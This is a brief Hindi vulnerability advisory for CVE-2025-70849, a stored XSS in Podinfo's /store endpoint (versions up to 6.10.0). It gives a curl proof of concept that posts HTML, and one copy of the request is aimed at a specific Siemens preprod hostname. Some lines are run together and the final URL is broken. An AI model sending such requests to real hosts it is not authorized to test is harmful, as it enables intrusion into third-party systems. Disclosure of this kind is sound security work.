
CVE-2025-70849: Podinfo में संग्रहीत XSS
Podinfo में एक सुरक्षा भेद्यता (CWE-79) की पहचान की गई, जो Kubernetes माइक्रोसर्विसेज को प्रदर्शित करने के लिए एक वेब एप्लिकेशन है। /store सुविधा अनधिकृत उपयोगकर्ताओं को मनमानी HTML/JS सामग्री अपलोड करने की अनुमति देती है, जिससे Stored XSS उत्पन्न होता है।
/store<= 6.10.0curl -X POST https://target/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'
curl -X POST https://podinfo.xcr.preprod55.prepd.eastus.kaas.sws.siemens.com/store -H "Content-Type: text/html" -d '<h1>CVE-2025-70849</h1>'

लौटाए गए हैश तक पहुँचें: https:///store/